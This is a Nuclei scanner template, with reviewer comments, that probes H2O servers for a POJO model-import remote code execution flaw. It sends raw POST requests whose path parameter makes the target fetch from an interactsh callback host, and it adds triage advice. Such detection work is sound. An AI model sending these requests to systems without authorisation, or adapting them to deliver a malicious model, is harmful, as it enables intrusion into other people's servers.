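# Nuclei template: out-of-band check for the H2O POJO model import issue.
#
# What it does: sends four POST requests to the H2O REST API
# (/3/ModelBuilders/generic/parameters three times, then
# /3/ModelBuilders/generic). The last three carry a `path` parameter that
# points at an interactsh callback host. The template reports a finding when
# an HTTP interaction with that host is recorded.
#
# What a match means: the target accepted these requests (none of them carries
# credentials) and made an outbound HTTP request to the supplied `path`.
# That shows the import path is reachable and fetches remote content; the
# template itself does not demonstrate code execution, so treat a hit as
# "exposed and fetching", and confirm impact against the referenced advisory.
#
# Triage for a hit: restrict network access to the H2O API to trusted
# clients, limit outbound connections from the H2O host, and check the
# referenced advisory for fixed versions.
id: h2o-pojo-import-rce

info:
  name: H2O RCE via POJO Model import
  author: Sierra Bearchell (Vuln Discovery), byt3bl33d3r (Nuclei Template)
  severity: critical
  description: RCE in H2O dashboard by (ab)using it's POJO Model import feature
  reference:
    - https://huntr.com/bounties/83dd17ec-053e-453c-befb-7d6736bf1836/
  classification:
    cvss-score: 10
    # NOTE(review): confirm cve-id and cwe-id against the huntr report listed
    # under `reference`; findings keyed on a wrong identifier get mis-tracked.
    cve-id: CVE-2023-6018
    cwe-id: CWE-78
  tags: h2o-3,h2o,cve,ml,protectai,huntr

http:
  - raw:
      # Request 1: posts only the model_id, with no `path`.
      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51

      # Requests 2 and 3 are byte-identical: same endpoint, same model_id, and
      # a `path` that URL-decodes to http://93{{interactsh-url}}.
      # NOTE(review): the literal "93" in front of {{interactsh-url}} looks
      # like a leftover; confirm that interactions for this host name are
      # still attributed to the scan, otherwise the check gives false
      # negatives.
      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

      - |
        POST /3/ModelBuilders/generic/parameters HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

      # Request 4: same body as requests 2 and 3, sent to
      # /3/ModelBuilders/generic instead of the /parameters endpoint.
      - |
        POST /3/ModelBuilders/generic HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        model_id=generic-68510df2-f19a-4871-8285-9321a7ef6d51&path=http%3A%2F%2F93{{interactsh-url}}

    # Single matcher: the only evidence checked is the protocol of the
    # recorded out-of-band interaction. HTTP response status and body from
    # the target are not inspected.
    matchers:
      - type: word
        part: interactsh_protocol # Confirms http Interaction
        words:
          - "http"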